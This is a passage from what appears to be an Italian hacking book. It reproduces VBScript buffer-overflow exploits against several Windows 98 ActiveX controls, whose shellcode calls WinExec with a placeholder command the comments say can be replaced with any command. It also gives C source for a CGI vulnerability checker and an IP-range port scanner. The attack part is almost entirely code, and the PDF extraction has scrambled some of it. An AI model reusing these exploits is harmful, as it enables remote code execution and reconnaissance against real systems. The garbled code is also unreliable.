"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Call exploitable method
pdf.setview(expstr)
--></script>

SETUPCTL
<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1" id =



"setupctl">
</object>
<script language="vbscript"><!-msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) + "Written by
Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA"
expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow



--></script>

REGWIZC
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
<script language="VbScript" ><!-msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Shane
Hird")
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32
expstr = expstr & Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr & Chr(53) 'You may need to use a different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)


'MOV EDX, BFF8D4CA (ExitProcess, Win98)


expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
RegWizObj.InvokeRegWizard(expstr)
--></script>

EYEDOG
The following code will terminate the browser:
<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"
id="eye"></object>
<script language="vbscript"><!-msgbox("EYEDOG OLE Control module Buffer Overrun (Local Version)" + Chr(10)
+ "Written by Shane Hird")
'Padding for the exploit
expstr =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Call exploitable method (MSInfoLoadFile)
eye.MSInfoLoadFile(expstr)
--></script>

HHOPEN
This will, again, terminate the browser:
<object
classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233"
id="hhopen"></OBJECT>
<script language="vbscript"><!-msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) + "Written By
Shane Hird")



expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA"
'Where the RET address appears to be, RET to ExitProcess (BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Extra padding to trigger the overrun
expstr = expstr +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr
--></script>

SETUPBBS


Again, shuts down the browser:


<object
classid="clsid:8F0F5093-0A70-11D0-BCA9-00C04FD85AA6"
id="setupbbs"></OBJECT>
<script language="vbscript"><!-msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
'RET address (ExitProcess BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'This buffer overrun can be triggered by either method.
'setupbbs.vAddNewsServer expstr, true
setupbbs.bIsNewsServerConfigured expstr
--></script>

Test per CGI


Ecco un sorgente che serve a testare le vulnerabilità relative ai CGI.
/* Tested on Slackware linux with kernel 2.0.35 */
#include <arpa/nameser.h>
#include <ctype.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

void main(int argc, char *argv[])


{
int sock,debugm=0;

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[50];
/* Don't u think 50 is enought? */
char *cginame[50]; /* Don't u think 50 is enought? */
buff[1] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
cginame[1] = "phf";
cginame[2] = "Count.cgi";
cginame[3] = "test-cgi";
cginame[4] = "php.cgi";
cginame[5] = "handler";
cginame[6] = "webgais";
cginame[7] = "websendmail";
cginame[8] = "webdist.cgi";
cginame[9] = "faxsurvey";
cginame[10] = "htmlscript";
cginame[11] = "pfdisplay";
cginame[12] = "perl.exe";
cginame[13] = "wwwboard.pl";
if (argc<2)
{
printf("\nusage : %s host ",argv[0]);
printf("\n
Or : %s host -d
for debug mode\n\n",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


exit(0);
}
printf("\n\n\t\t [CKS & Fdisk]'s CGI Checker\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd
version...... ]\n");
getchar();
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 13)
/* Change 13 to how many buff[?] u have above
*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL)
printf("Found !! ;)\n");
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n
------------------------\n",cgibuff);
printf("Press any key to continue....\n");
getchar();
}
close(sock);
}

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


}

Uno scanner di DOMINIO


Ecco un semplice scanner di dominio in grado di eseguire lo scan su un range di IP.
/**********************************
 * Domain Scanner v2.0
 * by HoGs HeaD
 * Fixed up the screwy stuff.
 * (C)1998 HoGs HeaD
 * You may not modify and
 * then redistribute
 * this source.
 *********************************/
#include <arpa/inet.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

void brk(int no){


printf("^C Interrupt!\n");
exit(1);
}
void main(int argc, char **argv)
{
struct hostent *host;
/* init stuff */
struct sockaddr_in sa;
int net, error;
int port=23, i, done=0;
char *curr_ip, *del, *cm[100];
int A1, A2, A3, A4;
int B1, B2, B3, B4;
int C1, C2, C3, C4;
printf("\nDomain Scanner v2.0 by HoGs HeaD\nHit any key to
end.\n");
if(argc < 3){
printf("Usage: domscan ip_begin ip_end port\nwhere ip_start
equals the
beginning IP(ie 127.26.26.1)\nand ip_end equals the ending IP(ie
147.26.27.12)\
nand port is the port to check on\n\n");
exit(0);
}
signal(SIGINT, brk);
if(argv[3]==NULL){
}else{
port=atoi(argv[3]);
}
/* Parse in the first Ip.... */
curr_ip=argv[1];

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


del=(char *)strtok(curr_ip, ".");
A1=atoi(del);
del=(char *)strtok(NULL, ".");
A2=atoi(del);
del=(char *)strtok(NULL, ".");
A3=atoi(del);
del=(char *)strtok(NULL, ".");
A4=atoi(del);
/* Read in Second Ip... */
curr_ip = argv[2];
del=(char *)strtok(curr_ip, ".");
B1=atoi(del);
del=(char *)strtok(NULL, ".");
B2=atoi(del);
del=(char *)strtok(NULL, ".");
B3=atoi(del);
del=(char *)strtok(NULL, ".");
B4=atoi(del);
/* We're finished parsing, now onto the actual scan... */
C1=A1;
C2=A2; /* SaVe DeM VaLueS! */
C3=A3;
C4=A4;
for(A4=C4;A4<=B4; A4++){
for(A3=C3;A3<=B3; A3++){
for(A2=C2;A2<=C2; A2++){
for(A1=C1;A1<=B1; A1++){
sprintf(curr_ip, "%d.%d.%d.%d", A1, A2, A3, A4);
build the
ip */
if( ( fork() ) == 0){
fork a chi
ld */
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(curr_ip);
sa.sin_port = htons(port);
socket is
set and... */
net = socket(AF_INET, SOCK_STREAM, 0);
create socket */
if(net < 2){
exit(2);
}
alarm(5);
wait 5 sec
onds until we cancel connection */
error = connect(net, (struct sockaddr *)&sa, sizeof sa);
attempt co
nnection */

/*
/*

/*
/*

/*

error < 0 ? printf("Error connecting to: %s %s\n", curr_ip,


strerror(errno)) : printf("Connection success at: %s\n", curr_ip);
shutdown(net,
2);
/* disconne
ct socket */
exit(0);
* exit chi
ld process */
}

/*

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


}
}
}
}
gets((char *)i);
}

/* Wait for enter to be pressed to exit */
